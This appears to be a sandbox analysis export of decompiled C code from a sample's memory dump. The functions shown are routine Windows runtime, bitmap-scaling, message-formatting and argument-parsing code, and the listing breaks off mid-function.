Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 85922d69eac58b553849b4939f9ebe2b6291e1533c257ba7745a1c0a1e2d1bc0
Instruction ID: f89579f9873c0bd8231ee56bae9f2ee923e31a334be52a40cb1d71675bc158b2
Opcode Fuzzy Hash: 85922d69eac58b553849b4939f9ebe2b6291e1533c257ba7745a1c0a1e2d1bc0
Instruction Fuzzy Hash: 9B01D732000149BFCF129F55CC41EEA3BBAEF88754F1580A9FA5866121C376E861EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00BC1E66 Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BC1E66() {
				void* _t4;
				void* _t8;

				E00BC3274();
				E00BC3208();
				if(E00BC2F2E() != 0) {
					_t4 = E00BC1FAC(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00BC2F6A();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00bc1e66
0x00bc1e6b
0x00bc1e77
0x00bc1e7c
0x00bc1e81
0x00bc1e83
0x00bc1e8e
0x00bc1e85
0x00bc1e85
0x00000000
0x00bc1e85
0x00bc1e79
0x00bc1e79
0x00bc1e7b
0x00bc1e7b

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00BC1E66
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00BC1E6B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00BC1E70

Part of subcall function 00BC2F2E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00BC2F3F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00BC1E85

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: db56094726013a0e7960dbb605aab973f1732d5fd0b5120fa08f3f94fc27d9a5
Instruction ID: f806c8ba5565d6af9597ba8e9bc13e71c7f5bf254c3f4914b937d7349d38f610
Opcode Fuzzy Hash: db56094726013a0e7960dbb605aab973f1732d5fd0b5120fa08f3f94fc27d9a5
Instruction Fuzzy Hash: BDC0482C140307A42C203BBC2252FAE63D49CA3BC5BD059CDECA0BB0239E2A090B2476

Uniqueness

Uniqueness Score: -1.00%

Function 00BB9EDB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00BB9EDB(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v116;
				void* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v152;
				signed int _v160;
				intOrPtr _v164;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v200;
				signed int _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr* _v232;
				intOrPtr* _v240;
				void* _v256;
				intOrPtr* _v264;
				void* __edi;
				signed int _t78;
				intOrPtr* _t84;
				void* _t86;
				signed int _t87;
				signed int _t90;
				short _t100;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t110;
				intOrPtr* _t116;
				intOrPtr* _t128;
				intOrPtr* _t131;
				intOrPtr* _t134;
				void* _t141;
				intOrPtr* _t146;
				intOrPtr* _t158;
				intOrPtr* _t161;
				signed int _t175;
				void* _t177;
				void* _t179;
				intOrPtr* _t181;
				signed int _t195;
				long long* _t197;
				long long _t200;

				_t200 = __fp0;
				if(E00BB9D6F() != 0) {
					_t141 = _a4;
					GetObjectW(_t141, 0x18,  &_v68);
					_t195 = _v0;
					asm("cdq");
					_t78 = _v72 * _v4 / _v76;
					if(_t78 < _t195) {
						_t195 = _t78;
					}
					_t177 = 0;
					_push( &_v120);
					_push(0xbd3684);
					_push(1);
					_push(0);
					_push(0xbd444c);
					if( *0xc01174() < 0) {
						L19:
						return _t141;
					} else {
						_t84 = _v140;
						 *0xbd2260(_t84, _t141, 0, 2,  &_v136, _t179);
						_t86 =  *((intOrPtr*)( *_t84 + 0x54))();
						_t87 = _v160;
						if(_t86 >= 0) {
							_v152 = 0;
							_t181 =  *((intOrPtr*)( *_t87 + 0x28));
							_t146 = _t181;
							 *0xbd2260(_t87,  &_v152);
							if( *_t181() >= 0) {
								_t90 = _v160;
								asm("fldz");
								 *_t197 = _t200;
								 *0xbd2260(_t90, _v164, 0xbd445c, 0, 0, _t146, _t146, 0);
								if( *((intOrPtr*)( *_t90 + 0x20))() >= 0) {
									E00BBF1A0(0,  &_v136, 0, 0x2c);
									_v132 = _v84;
									_v136 = 0x28;
									_v128 =  ~_t195;
									_v120 = 0;
									_v124 = 1;
									_t100 = 0x20;
									_v122 = _t100;
									_t103 =  *0xc0105c(0,  &_v136, 0,  &_v180, 0, 0);
									_v208 = _t103;
									asm("sbb ecx, ecx");
									if(( ~_t103 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t158 = _v224;
										 *0xbd2260(_t158,  &_v212);
										 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x2c))))();
										_t116 = _v220;
										 *0xbd2260(_t116, _v228, _v116, _t195, 3);
										 *((intOrPtr*)( *_t116 + 0x20))();
										_t175 = _v136;
										_t161 = _v240;
										_v220 = _t175;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t195;
										 *0xbd2260(_t161,  &_v228, _t175 << 2, _t175 * _t195 << 2, _v232);
										if( *((intOrPtr*)( *_t161 + 0x1c))() < 0) {
											DeleteObject(_v256);
										} else {
											_t177 = _v256;
										}
										_t128 = _v264;
										 *0xbd2260(_t128);
										 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 8))))();
									}
									_t104 = _v220;
									 *0xbd2260(_t104);
									 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
									_t107 = _v220;
									 *0xbd2260(_t107);
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))();
									_t110 = _v232;
									 *0xbd2260(_t110);
									 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 8))))();
									if(_t177 != 0) {
										_t141 = _t177;
									}
									L18:
									goto L19;
								}
								_t131 = _v192;
								 *0xbd2260(_t131);
								 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))();
							}
							_t134 = _v200;
							 *0xbd2260(_t134);
							 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 8))))();
							_t87 = _v208;
						}
						 *0xbd2260(_t87);
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))();
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00BBA163();
			}

0x00bb9edb
0x00bb9ee5
0x00bb9efe
0x00bb9f0b
0x00bb9f1a
0x00bb9f21
0x00bb9f22
0x00bb9f28
0x00bb9f2a
0x00bb9f2a
0x00bb9f31
0x00bb9f33
0x00bb9f34
0x00bb9f3c
0x00bb9f3d
0x00bb9f3e
0x00bb9f4b
0x00bba158
0x00000000
0x00bb9f51
0x00bb9f51
0x00bb9f65
0x00bb9f6b
0x00bb9f70
0x00bb9f74
0x00bb9f8b
0x00bb9f97
0x00bb9f9a
0x00bb9f9c
0x00bb9fa6
0x00bb9fc2
0x00bb9fc6
0x00bb9fcd
0x00bb9fdf
0x00bb9fea
0x00bba00a
0x00bba019
0x00bba021
0x00bba029
0x00bba032
0x00bba036
0x00bba03b
0x00bba03e
0x00bba04f
0x00bba057
0x00bba05d
0x00bba06b
0x00bba071
0x00bba082
0x00bba088
0x00bba08a
0x00bba0a2
0x00bba0a8
0x00bba0ab
0x00bba0b8
0x00bba0bf
0x00bba0c3
0x00bba0c7
0x00bba0cb
0x00bba0e4
0x00bba0ef
0x00bba0fb
0x00bba0f1
0x00bba0f1
0x00bba0f1
0x00bba101
0x00bba10d
0x00bba113
0x00bba113
0x00bba115
0x00bba121
0x00bba127
0x00bba129
0x00bba135
0x00bba13b
0x00bba13d
0x00bba149
0x00bba14f
0x00bba153
0x00bba155
0x00bba155
0x00bba157
0x00000000
0x00bba157
0x00bb9fec
0x00bb9ff8
0x00bb9ffe
0x00bb9ffe
0x00bb9fa8
0x00bb9fb4
0x00bb9fba
0x00bb9fbc
0x00bb9fbc
0x00bb9f7e
0x00bb9f84
0x00000000
0x00bb9f84
0x00bb9f4b
0x00bb9ee7
0x00bb9eeb
0x00bb9eef
0x00000000

APIs

Part of subcall function 00BB9D6F: GetDC.USER32(00000000), ref: 00BB9D73
Part of subcall function 00BB9D6F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BB9D7E
Part of subcall function 00BB9D6F: ReleaseDC.USER32(00000000,00000000), ref: 00BB9D89

GetObjectW.GDI32(?,00000018,?), ref: 00BB9F0B

Part of subcall function 00BBA163: GetDC.USER32(00000000), ref: 00BBA16C
Part of subcall function 00BBA163: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00BB9EF8,?,?,?), ref: 00BBA19B
Part of subcall function 00BBA163: ReleaseDC.USER32(00000000,?), ref: 00BBA233

Strings

(, xrefs: 00BBA021

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 0fb6fbfb4d36816936c02c79421e33eb91211ab8ca1f3a69f8e8402cb99f18a7
Instruction ID: 3e6bafe4c4eab7ac54c93b05d322ba151ed4229b60096af43ca2027dc3037581
Opcode Fuzzy Hash: 0fb6fbfb4d36816936c02c79421e33eb91211ab8ca1f3a69f8e8402cb99f18a7
Instruction Fuzzy Hash: 45813375608344AFC714DF28CC94A6ABBE9FF89714F00495EF98AD7260DB70AD05CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0D97 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00BB0D97(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E00BBCBA4();
						_t28 = E00BADD11(_t41, 0x96);
						return E00BB9EB3( *0xbe7448, E00BADD11(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E00BADD11(_t41));
						_push( *_t44);
						L19:
						_t32 = E00BBADC4();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M00BB105B))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00BADD11(__ecx, 0xc8) =  &_v516;
										__eax = E00BA3FD6( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00BBADC4( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00BADD11(_t41);
							L7:
							_push(0);
							L8:
							return E00BBADC4();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M00BB1003))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00BBA578();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00BADD11(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
									goto L23;
								case 0xc:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x84);
									goto L13;
								case 0xd:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x83);
									goto L13;
								case 0xe:
									goto L61;
								case 0xf:
									_push( *((intOrPtr*)(__esi + 8)));
									_push( *((intOrPtr*)(__esi + 4)));
									__eax = E00BADD11(__ecx, 0xd2);
									return __eax;
								case 0x10:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x79);
									goto L13;
								case 0x11:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xdc);
									L13:
									_push(E00BADD11(_t41));
									_push( *_t44);
									goto L8;
							}
						}
					}
				}
				L61:
				return _t26;
			}

0x00bb0d97
0x00bb0da1
0x00bb0da3
0x00bb0da6
0x00bb0da9
0x00bb0fd0
0x00bb0fd3
0x00bb0fd5
0x00bb0fe1
0x00000000
0x00bb0ff8
0x00bb0daf
0x00bb0daf
0x00bb0fc6
0x00bb0ef3
0x00bb0ef8
0x00bb0ef9
0x00bb0e36
0x00bb0e36
0x00bb0dff
0x00000000
0x00bb0dff
0x00bb0db5
0x00bb0db8
0x00bb0eb8
0x00bb0ebb
0x00bb0f7b
0x00bb0f7b
0x00bb0f7e
0x00bb0fbc
0x00000000
0x00bb0fbc
0x00bb0f80
0x00bb0f80
0x00bb0f83
0x00bb0fb5
0x00000000
0x00bb0fb5
0x00bb0f85
0x00bb0f85
0x00bb0f88
0x00bb0fa8
0x00bb0fab
0x00000000
0x00bb0fab
0x00bb0f8a
0x00bb0f8a
0x00bb0f8d
0x00bb0f9e
0x00000000
0x00bb0f9e
0x00bb0f8f
0x00bb0f8f
0x00bb0f92
0x00bb0f94
0x00000000
0x00bb0f94
0x00bb0ec1
0x00bb0ec1
0x00bb0f74
0x00000000
0x00bb0f74
0x00bb0ec7
0x00bb0eca
0x00bb0ecd
0x00bb0ed3
0x00000000
0x00bb0eda
0x00000000
0x00000000
0x00bb0ee4
0x00000000
0x00000000
0x00bb0eee
0x00000000
0x00000000
0x00bb0f00
0x00000000
0x00000000
0x00bb0f04
0x00000000
0x00000000
0x00bb0f08
0x00bb0f0b
0x00000000
0x00000000
0x00bb0f12
0x00000000
0x00000000
0x00bb0f19
0x00000000
0x00000000
0x00bb0f20
0x00bb0f23
0x00000000
0x00000000
0x00000000
0x00000000
0x00bb0f2d
0x00bb0f30
0x00000000
0x00000000
0x00bb0f45
0x00bb0f51
0x00bb0f56
0x00bb0f59
0x00bb0f5f
0x00000000
0x00000000
0x00bb0ed3
0x00bb0ecd
0x00bb0dbe
0x00bb0dbe
0x00bb0eaf
0x00bb0eb1
0x00bb0e53
0x00bb0e53
0x00bb0ddb
0x00bb0ddb
0x00bb0ddd
0x00000000
0x00bb0de2
0x00bb0dc7
0x00bb0dcd
0x00000000
0x00bb0dea
0x00bb0dec
0x00bb0df1
0x00000000
0x00000000
0x00bb0dd4
0x00bb0dd6
0x00000000
0x00000000
0x00bb0df8
0x00bb0dfa
0x00000000
0x00000000
0x00bb0e05
0x00bb0e08
0x00000000
0x00000000
0x00bb0e14
0x00bb0e17
0x00000000
0x00000000
0x00bb0e1b
0x00bb0e1e
0x00000000
0x00000000
0x00bb0e22
0x00bb0e25
0x00000000
0x00000000
0x00bb0e2c
0x00bb0e2e
0x00bb0e33
0x00bb0e34
0x00000000
0x00000000
0x00bb0e3e
0x00bb0e41
0x00000000
0x00000000
0x00bb0e45
0x00bb0e48
0x00000000
0x00000000
0x00bb0e4c
0x00bb0e4e
0x00000000
0x00000000
0x00bb0e5b
0x00bb0e5d
0x00000000
0x00000000
0x00bb0e64
0x00bb0e67
0x00000000
0x00000000
0x00bb0e6e
0x00bb0e71
0x00000000
0x00000000
0x00000000
0x00000000
0x00bb0e78
0x00bb0e7b
0x00bb0e83
0x00000000
0x00000000
0x00bb0e98
0x00bb0e9b
0x00000000
0x00000000
0x00bb0ea2
0x00bb0ea5
0x00bb0e0a
0x00bb0e0f
0x00bb0e10
0x00000000
0x00000000
0x00bb0dcd
0x00bb0dc7
0x00bb0db8
0x00bb1001
0x00bb1001

APIs

_swprintf.LIBCMT ref: 00BB0F51

Strings

%ls, xrefs: 00BB0DD6, 00BB0DEC
%s: %s, xrefs: 00BB0F60

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 8c657348c2f0dd0d587371a58fc5bb7584a7100988c60e8de15e11b9f9e48015
Instruction ID: 08e585346813b023ec166e1d6818907ced1188d7116d5fb255be650586cf1521
Opcode Fuzzy Hash: 8c657348c2f0dd0d587371a58fc5bb7584a7100988c60e8de15e11b9f9e48015
Instruction Fuzzy Hash: 9F51A331AA8305FBEA213A948DC3FF776D5FB04B00F2049D6B387688E1D9E19650A757

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA798 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00BCA798(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = E00BC777C(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00BCE6E1(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00BC86C9();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E00BC8429(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = E00BCE6E1(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E00BCAB67(_a12, _t193, __eflags, _t213);
													E00BC835E(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = E00BCE6E1(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00BC86C9();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0xbdd668; // 0xb57946a0
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = E00BCE730(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
